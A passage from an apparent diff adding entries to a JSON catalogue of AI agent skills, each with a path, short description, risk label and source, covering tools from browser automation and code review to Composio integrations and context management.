+ "description": "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, an...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "browser-extension-builder",
+ "path": "skills/browser-extension-builder",
+ "category": "uncategorized",
+ "name": "browser-extension-builder",
+ "description": "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bullmq-specialist",
+ "path": "skills/bullmq-specialist",
+ "category": "uncategorized",
+ "name": "bullmq-specialist",
+ "description": "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bun-development",
+ "path": "skills/bun-development",
+ "category": "uncategorized",
+ "name": "bun-development",
+ "description": "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, o...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "burp-suite-testing",
+ "path": "skills/burp-suite-testing",
+ "category": "uncategorized",
+ "name": "burp-suite-testing",
+ "description": "This skill should be used when the user asks to \"intercept HTTP traffic\", \"modify web requests\", \"use Burp Suite for testing\", \"perform web vulnerability scanning\", \"test with Burp ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "business-analyst",
+ "path": "skills/business-analyst",
+ "category": "uncategorized",
+ "name": "business-analyst",
+ "description": "Master modern business analysis with AI-powered analytics, real-time dashboards, and data-driven insights. Build comprehensive KPI frameworks, predictive models, and strategic recommendations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "busybox-on-windows",
+ "path": "skills/busybox-on-windows",
+ "category": "uncategorized",
+ "name": "busybox-on-windows",
+ "description": "How to use a Win32 build of BusyBox to run many of the standard UNIX command line tools on Windows.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c-pro",
+ "path": "skills/c-pro",
+ "category": "uncategorized",
+ "name": "c-pro",
+ "description": "Write efficient C code with proper memory management, pointer",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c4-architecture-c4-architecture",
+ "path": "skills/c4-architecture-c4-architecture",
+ "category": "uncategorized",
+ "name": "c4-architecture-c4-architecture",
+ "description": "Generate comprehensive C4 architecture documentation for an existing repository/codebase using a bottom-up analysis approach.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c4-code",
+ "path": "skills/c4-code",
+ "category": "uncategorized",
+ "name": "c4-code",
+ "description": "Expert C4 Code-level documentation specialist. Analyzes code directories to create comprehensive C4 code-level documentation including function signatures, arguments, dependencies, and code structure.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c4-component",
+ "path": "skills/c4-component",
+ "category": "uncategorized",
+ "name": "c4-component",
+ "description": "Expert C4 Component-level documentation specialist. Synthesizes C4 Code-level documentation into Component-level architecture, defining component boundaries, interfaces, and relationships.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c4-container",
+ "path": "skills/c4-container",
+ "category": "uncategorized",
+ "name": "c4-container",
+ "description": "Expert C4 Container-level documentation specialist.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "c4-context",
+ "path": "skills/c4-context",
+ "category": "uncategorized",
+ "name": "c4-context",
+ "description": "Expert C4 Context-level documentation specialist. Creates high-level system context diagrams, documents personas, user journeys, system features, and external dependencies.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cal-com-automation",
+ "path": "skills/cal-com-automation",
+ "category": "uncategorized",
+ "name": "cal-com-automation",
+ "description": "Automate Cal.com tasks via Rube MCP (Composio): manage bookings, check availability, configure webhooks, and handle teams. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "calc",
+ "path": "skills/libreoffice/calc",
+ "category": "spreadsheet-processing",
+ "name": "calc",
+ "description": "Spreadsheet creation, format conversion (ODS/XLSX/CSV), formulas, data automation with LibreOffice Calc.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "calendly-automation",
+ "path": "skills/calendly-automation",
+ "category": "uncategorized",
+ "name": "calendly-automation",
+ "description": "Automate Calendly scheduling, event management, invitee tracking, availability checks, and organization administration via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "canva-automation",
+ "path": "skills/canva-automation",
+ "category": "uncategorized",
+ "name": "canva-automation",
+ "description": "Automate Canva tasks via Rube MCP (Composio): designs, exports, folders, brand templates, autofill. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "canvas-design",
+ "path": "skills/canvas-design",
+ "category": "uncategorized",
+ "name": "canvas-design",
+ "description": "Create beautiful visual art in .png and .pdf documents using design philosophy. You should use this skill when the user asks to create a poster, piece of art, design, or other static piece. Create ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "carrier-relationship-management",
+ "path": "skills/carrier-relationship-management",
+ "category": "uncategorized",
+ "name": "carrier-relationship-management",
+ "description": "Codified expertise for managing carrier portfolios, negotiating freight rates, tracking carrier performance, allocating freight, and maintaining strategic carrier relationships.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-backend-patterns",
+ "path": "skills/cc-skill-backend-patterns",
+ "category": "uncategorized",
+ "name": "cc-skill-backend-patterns",
+ "description": "Backend architecture patterns, API design, database optimization, and server-side best practices for Node.js, Express, and Next.js API routes.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-clickhouse-io",
+ "path": "skills/cc-skill-clickhouse-io",
+ "category": "uncategorized",
+ "name": "cc-skill-clickhouse-io",
+ "description": "ClickHouse database patterns, query optimization, analytics, and data engineering best practices for high-performance analytical workloads.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-coding-standards",
+ "path": "skills/cc-skill-coding-standards",
+ "category": "uncategorized",
+ "name": "cc-skill-coding-standards",
+ "description": "Universal coding standards, best practices, and patterns for TypeScript, JavaScript, React, and Node.js development.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-continuous-learning",
+ "path": "skills/cc-skill-continuous-learning",
+ "category": "uncategorized",
+ "name": "cc-skill-continuous-learning",
+ "description": "Development skill from everything-claude-code",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-frontend-patterns",
+ "path": "skills/cc-skill-frontend-patterns",
+ "category": "uncategorized",
+ "name": "cc-skill-frontend-patterns",
+ "description": "Frontend development patterns for React, Next.js, state management, performance optimization, and UI best practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-project-guidelines-example",
+ "path": "skills/cc-skill-project-guidelines-example",
+ "category": "uncategorized",
+ "name": "cc-skill-project-guidelines-example",
+ "description": "Project Guidelines Skill (Example)",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-security-review",
+ "path": "skills/cc-skill-security-review",
+ "category": "uncategorized",
+ "name": "cc-skill-security-review",
+ "description": "Use this skill when adding authentication, handling user input, working with secrets, creating API endpoints, or implementing payment/sensitive features. Provides comprehensive security checklist a...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cc-skill-strategic-compact",
+ "path": "skills/cc-skill-strategic-compact",
+ "category": "uncategorized",
+ "name": "cc-skill-strategic-compact",
+ "description": "Development skill from everything-claude-code",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cdk-patterns",
+ "path": "skills/cdk-patterns",
+ "category": "uncategorized",
+ "name": "cdk-patterns",
+ "description": "Common AWS CDK patterns and constructs for building cloud infrastructure with TypeScript, Python, or Java. Use when designing reusable CDK stacks and L3 constructs.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "changelog-automation",
+ "path": "skills/changelog-automation",
+ "category": "uncategorized",
+ "name": "changelog-automation",
+ "description": "Automate changelog generation from commits, PRs, and releases following Keep a Changelog format. Use when setting up release workflows, generating release notes, or standardizing commit conventions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "chrome-extension-developer",
+ "path": "skills/chrome-extension-developer",
+ "category": "uncategorized",
+ "name": "chrome-extension-developer",
+ "description": "Expert in building Chrome Extensions using Manifest V3. Covers background scripts, service workers, content scripts, and cross-context communication.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cicd-automation-workflow-automate",
+ "path": "skills/cicd-automation-workflow-automate",
+ "category": "uncategorized",
+ "name": "cicd-automation-workflow-automate",
+ "description": "You are a workflow automation expert specializing in creating efficient CI/CD pipelines, GitHub Actions workflows, and automated development processes. Design automation that reduces manual work, i...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "circleci-automation",
+ "path": "skills/circleci-automation",
+ "category": "uncategorized",
+ "name": "circleci-automation",
+ "description": "Automate CircleCI tasks via Rube MCP (Composio): trigger pipelines, monitor workflows/jobs, retrieve artifacts and test metadata. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "clarity-gate",
+ "path": "skills/clarity-gate",
+ "category": "uncategorized",
+ "name": "clarity-gate",
+ "description": "Pre-ingestion verification for epistemic quality in RAG systems with 9-point verification and Two-Round HITL workflow",
+ "risk": "safe",
+ "source": "https://github.com/frmoretto/clarity-gate",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-ally-health",
+ "path": "skills/claude-ally-health",
+ "category": "uncategorized",
+ "name": "claude-ally-health",
+ "description": "A health assistant skill for medical information analysis, symptom tracking, and wellness guidance.",
+ "risk": "safe",
+ "source": "https://github.com/huifer/Claude-Ally-Health",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-code-guide",
+ "path": "skills/claude-code-guide",
+ "category": "uncategorized",
+ "name": "claude-code-guide",
+ "description": "Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies \\\"Thinking\\\" keywords, debugging techniques, and best practices for interacting wit...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-d3js-skill",
+ "path": "skills/claude-d3js-skill",
+ "category": "uncategorized",
+ "name": "claude-d3js-skill",
+ "description": "Creating interactive data visualisations using d3.js. This skill should be used when creating custom charts, graphs, network diagrams, geographic visualisations, or any complex SVG-based data visua...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-scientific-skills",
+ "path": "skills/claude-scientific-skills",
+ "category": "uncategorized",
+ "name": "claude-scientific-skills",
+ "description": "Scientific research and analysis skills",
+ "risk": "safe",
+ "source": "https://github.com/K-Dense-AI/claude-scientific-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-speed-reader",
+ "path": "skills/claude-speed-reader",
+ "category": "uncategorized",
+ "name": "claude-speed-reader",
+ "description": "-Speed read Claude's responses at 600+ WPM using RSVP with Spritz-style ORP highlighting",
+ "risk": "safe",
+ "source": "https://github.com/SeanZoR/claude-speed-reader",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "claude-win11-speckit-update-skill",
+ "path": "skills/claude-win11-speckit-update-skill",
+ "category": "uncategorized",
+ "name": "claude-win11-speckit-update-skill",
+ "description": "Windows 11 system management",
+ "risk": "safe",
+ "source": "https://github.com/NotMyself/claude-win11-speckit-update-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "clean-code",
+ "path": "skills/clean-code",
+ "category": "uncategorized",
+ "name": "clean-code",
+ "description": "Applies principles from Robert C. Martin's 'Clean Code'. Use this skill when writing, reviewing, or refactoring code to ensure high quality, readability, and maintainability. Covers naming, functio...",
+ "risk": "safe",
+ "source": "ClawForge (https://github.com/jackjin1997/ClawForge)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "clerk-auth",
+ "path": "skills/clerk-auth",
+ "category": "uncategorized",
+ "name": "clerk-auth",
+ "description": "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync Use when: adding authentication, clerk auth, user authentication, sign in, sign up.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "clickup-automation",
+ "path": "skills/clickup-automation",
+ "category": "uncategorized",
+ "name": "clickup-automation",
+ "description": "Automate ClickUp project management including tasks, spaces, folders, lists, comments, and team operations via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "close-automation",
+ "path": "skills/close-automation",
+ "category": "uncategorized",
+ "name": "close-automation",
+ "description": "Automate Close CRM tasks via Rube MCP (Composio): create leads, manage calls/SMS, handle tasks, and track notes. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cloud-architect",
+ "path": "skills/cloud-architect",
+ "category": "uncategorized",
+ "name": "cloud-architect",
+ "description": "Expert cloud architect specializing in AWS/Azure/GCP multi-cloud infrastructure design, advanced IaC (Terraform/OpenTofu/CDK), FinOps cost optimization, and modern architectural patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cloud-devops",
+ "path": "skills/cloud-devops",
+ "category": "workflow-bundle",
+ "name": "cloud-devops",
+ "description": "Cloud infrastructure and DevOps workflow covering AWS, Azure, GCP, Kubernetes, Terraform, CI/CD, monitoring, and cloud-native development.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cloud-penetration-testing",
+ "path": "skills/cloud-penetration-testing",
+ "category": "uncategorized",
+ "name": "cloud-penetration-testing",
+ "description": "This skill should be used when the user asks to \"perform cloud penetration testing\", \"assess Azure or AWS or GCP security\", \"enumerate cloud resources\", \"exploit cloud misconfiguratio...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cloudflare-workers-expert",
+ "path": "skills/cloudflare-workers-expert",
+ "category": "uncategorized",
+ "name": "cloudflare-workers-expert",
+ "description": "Expert in Cloudflare Workers and the Edge Computing ecosystem. Covers Wrangler, KV, D1, Durable Objects, and R2 storage.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "cloudformation-best-practices",
+ "path": "skills/cloudformation-best-practices",
+ "category": "uncategorized",
+ "name": "cloudformation-best-practices",
+ "description": "CloudFormation template optimization, nested stacks, drift detection, and production-ready patterns. Use when writing or reviewing CF templates.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "coda-automation",
+ "path": "skills/coda-automation",
+ "category": "uncategorized",
+ "name": "coda-automation",
+ "description": "Automate Coda tasks via Rube MCP (Composio): manage docs, pages, tables, rows, formulas, permissions, and publishing. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-documentation-code-explain",
+ "path": "skills/code-documentation-code-explain",
+ "category": "uncategorized",
+ "name": "code-documentation-code-explain",
+ "description": "You are a code education expert specializing in explaining complex code through clear narratives, visual diagrams, and step-by-step breakdowns. Transform difficult concepts into understandable expl...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-documentation-doc-generate",
+ "path": "skills/code-documentation-doc-generate",
+ "category": "uncategorized",
+ "name": "code-documentation-doc-generate",
+ "description": "You are a documentation expert specializing in creating comprehensive, maintainable documentation from code. Generate API docs, architecture diagrams, user guides, and technical references using AI...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-refactoring-context-restore",
+ "path": "skills/code-refactoring-context-restore",
+ "category": "uncategorized",
+ "name": "code-refactoring-context-restore",
+ "description": "Use when working with code refactoring context restore",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-refactoring-refactor-clean",
+ "path": "skills/code-refactoring-refactor-clean",
+ "category": "uncategorized",
+ "name": "code-refactoring-refactor-clean",
+ "description": "You are a code refactoring expert specializing in clean code principles, SOLID design patterns, and modern software engineering best practices. Analyze and refactor the provided code to improve its...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-refactoring-tech-debt",
+ "path": "skills/code-refactoring-tech-debt",
+ "category": "uncategorized",
+ "name": "code-refactoring-tech-debt",
+ "description": "You are a technical debt expert specializing in identifying, quantifying, and prioritizing technical debt in software projects. Analyze the codebase to uncover debt, assess its impact, and create acti",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-review-ai-ai-review",
+ "path": "skills/code-review-ai-ai-review",
+ "category": "uncategorized",
+ "name": "code-review-ai-ai-review",
+ "description": "You are an expert AI-powered code review specialist combining automated static analysis, intelligent pattern recognition, and modern DevOps practices. Leverage AI tools (GitHub Copilot, Qodo, GPT-5, C",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-review-checklist",
+ "path": "skills/code-review-checklist",
+ "category": "uncategorized",
+ "name": "code-review-checklist",
+ "description": "Comprehensive checklist for conducting thorough code reviews covering functionality, security, performance, and maintainability",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-review-excellence",
+ "path": "skills/code-review-excellence",
+ "category": "uncategorized",
+ "name": "code-review-excellence",
+ "description": "Master effective code review practices to provide constructive feedback, catch bugs early, and foster knowledge sharing while maintaining team morale. Use when reviewing pull requests, establishing...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "code-reviewer",
+ "path": "skills/code-reviewer",
+ "category": "uncategorized",
+ "name": "code-reviewer",
+ "description": "Elite code review expert specializing in modern AI-powered code",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "codebase-cleanup-deps-audit",
+ "path": "skills/codebase-cleanup-deps-audit",
+ "category": "uncategorized",
+ "name": "codebase-cleanup-deps-audit",
+ "description": "You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for known vulnerabilities, licensing issues,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "codebase-cleanup-refactor-clean",
+ "path": "skills/codebase-cleanup-refactor-clean",
+ "category": "uncategorized",
+ "name": "codebase-cleanup-refactor-clean",
+ "description": "You are a code refactoring expert specializing in clean code principles, SOLID design patterns, and modern software engineering best practices. Analyze and refactor the provided code to improve its...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "codebase-cleanup-tech-debt",
+ "path": "skills/codebase-cleanup-tech-debt",
+ "category": "uncategorized",
+ "name": "codebase-cleanup-tech-debt",
+ "description": "You are a technical debt expert specializing in identifying, quantifying, and prioritizing technical debt in software projects. Analyze the codebase to uncover debt, assess its impact, and create acti",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "codex-review",
+ "path": "skills/codex-review",
+ "category": "uncategorized",
+ "name": "codex-review",
+ "description": "Professional code review with auto CHANGELOG generation, integrated with Codex AI",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "commit",
+ "path": "skills/commit",
+ "category": "uncategorized",
+ "name": "commit",
+ "description": "Create commit messages following Sentry conventions. Use when committing code changes, writing commit messages, or formatting git history. Follows conventional commits with Sentry-specific issue re...",
+ "risk": "safe",
+ "source": "https://github.com/getsentry/skills/tree/main/plugins/sentry-skills/skills/commit",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "competitive-landscape",
+ "path": "skills/competitive-landscape",
+ "category": "uncategorized",
+ "name": "competitive-landscape",
+ "description": "This skill should be used when the user asks to \\\\\\\"analyze competitors\", \"assess competitive landscape\", \"identify differentiation\", \"evaluate market positioning\", \"apply Porter's Five Forces\",...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "competitor-alternatives",
+ "path": "skills/competitor-alternatives",
+ "category": "uncategorized",
+ "name": "competitor-alternatives",
+ "description": "When the user wants to create competitor comparison or alternative pages for SEO and sales enablement. Also use when the user mentions 'alternative page,' 'vs page,' 'competitor comparison,' 'compa...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "comprehensive-review-full-review",
+ "path": "skills/comprehensive-review-full-review",
+ "category": "uncategorized",
+ "name": "comprehensive-review-full-review",
+ "description": "Use when working with comprehensive review full review",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "comprehensive-review-pr-enhance",
+ "path": "skills/comprehensive-review-pr-enhance",
+ "category": "uncategorized",
+ "name": "comprehensive-review-pr-enhance",
+ "description": "You are a PR optimization expert specializing in creating high-quality pull requests that facilitate efficient code reviews. Generate comprehensive PR descriptions, automate review processes, and e...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "computer-use-agents",
+ "path": "skills/computer-use-agents",
+ "category": "uncategorized",
+ "name": "computer-use-agents",
+ "description": "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-so...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "computer-vision-expert",
+ "path": "skills/computer-vision-expert",
+ "category": "uncategorized",
+ "name": "computer-vision-expert",
+ "description": "SOTA Computer Vision Expert (2026). Specialized in YOLO26, Segment Anything 3 (SAM 3), Vision Language Models, and real-time spatial analysis.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "concise-planning",
+ "path": "skills/concise-planning",
+ "category": "uncategorized",
+ "name": "concise-planning",
+ "description": "Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-implement",
+ "path": "skills/conductor-implement",
+ "category": "uncategorized",
+ "name": "conductor-implement",
+ "description": "Execute tasks from a track's implementation plan following TDD workflow",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-manage",
+ "path": "skills/conductor-manage",
+ "category": "uncategorized",
+ "name": "conductor-manage",
+ "description": "Manage track lifecycle: archive, restore, delete, rename, and cleanup",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-new-track",
+ "path": "skills/conductor-new-track",
+ "category": "uncategorized",
+ "name": "conductor-new-track",
+ "description": "Create a new track with specification and phased implementation plan",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-revert",
+ "path": "skills/conductor-revert",
+ "category": "uncategorized",
+ "name": "conductor-revert",
+ "description": "Git-aware undo by logical work unit (track, phase, or task)",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-setup",
+ "path": "skills/conductor-setup",
+ "category": "uncategorized",
+ "name": "conductor-setup",
+ "description": "Initialize project with Conductor artifacts (product definition,\ntech stack, workflow, style guides)\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-status",
+ "path": "skills/conductor-status",
+ "category": "uncategorized",
+ "name": "conductor-status",
+ "description": "Display project status, active tracks, and next actions",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "conductor-validator",
+ "path": "skills/conductor-validator",
+ "category": "uncategorized",
+ "name": "conductor-validator",
+ "description": "Validates Conductor project artifacts for completeness,\nconsistency, and correctness. Use after setup, when diagnosing issues, or\nbefore implementation to verify project context.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "confluence-automation",
+ "path": "skills/confluence-automation",
+ "category": "uncategorized",
+ "name": "confluence-automation",
+ "description": "Automate Confluence page creation, content search, space management, labels, and hierarchy navigation via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "content-creator",
+ "path": "skills/content-creator",
+ "category": "marketing",
+ "name": "content-creator",
+ "description": "Create SEO-optimized marketing content with consistent brand voice. Includes brand voice analyzer, SEO optimizer, content frameworks, and social media templates. Use when writing blog posts, creati...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "content-marketer",
+ "path": "skills/content-marketer",
+ "category": "uncategorized",
+ "name": "content-marketer",
+ "description": "Elite content marketing strategist specializing in AI-powered content creation, omnichannel distribution, SEO optimization, and data-driven performance marketing.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-compression",
+ "path": "skills/context-compression",
+ "category": "uncategorized",
+ "name": "context-compression",
+ "description": "Design and evaluate compression strategies for long-running sessions",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/context-compression",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-degradation",
+ "path": "skills/context-degradation",
+ "category": "uncategorized",
+ "name": "context-degradation",
+ "description": "Recognize patterns of context failure: lost-in-middle, poisoning, distraction, and clash",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/context-degradation",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-driven-development",
+ "path": "skills/context-driven-development",
+ "category": "uncategorized",
+ "name": "context-driven-development",
+ "description": "Use this skill when working with Conductor's context-driven development methodology, managing project context artifacts, or understanding the relationship between product.md, tech-stack.md, and...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-fundamentals",
+ "path": "skills/context-fundamentals",
+ "category": "uncategorized",
+ "name": "context-fundamentals",
+ "description": "Understand what context is, why it matters, and the anatomy of context in agent systems",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/context-fundamentals",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-management-context-restore",
+ "path": "skills/context-management-context-restore",
+ "category": "uncategorized",
+ "name": "context-management-context-restore",
+ "description": "Use when working with context management context restore",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-management-context-save",
+ "path": "skills/context-management-context-save",
+ "category": "uncategorized",
+ "name": "context-management-context-save",
+ "description": "Use when working with context management context save",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-manager",
+ "path": "skills/context-manager",
+ "category": "uncategorized",
+ "name": "context-manager",
+ "description": "Elite AI context engineering specialist mastering dynamic context management, vector databases, knowledge graphs, and intelligent memory systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-optimization",
+ "path": "skills/context-optimization",
+ "category": "uncategorized",
+ "name": "context-optimization",
+ "description": "Apply compaction, masking, and caching strategies",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/context-optimization",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context-window-management",
+ "path": "skills/context-window-management",
+ "category": "uncategorized",
+ "name": "context-window-management",
+ "description": "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot Use when: context window, token limit, context management, context engineering, long...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "context7-auto-research",
+ "path": "skills/context7-auto-research",
+ "category": "uncategorized",
+ "name": "context7-auto-research",
+ "description": "Automatically fetch latest library/framework documentation for Claude Code via Context7 API",
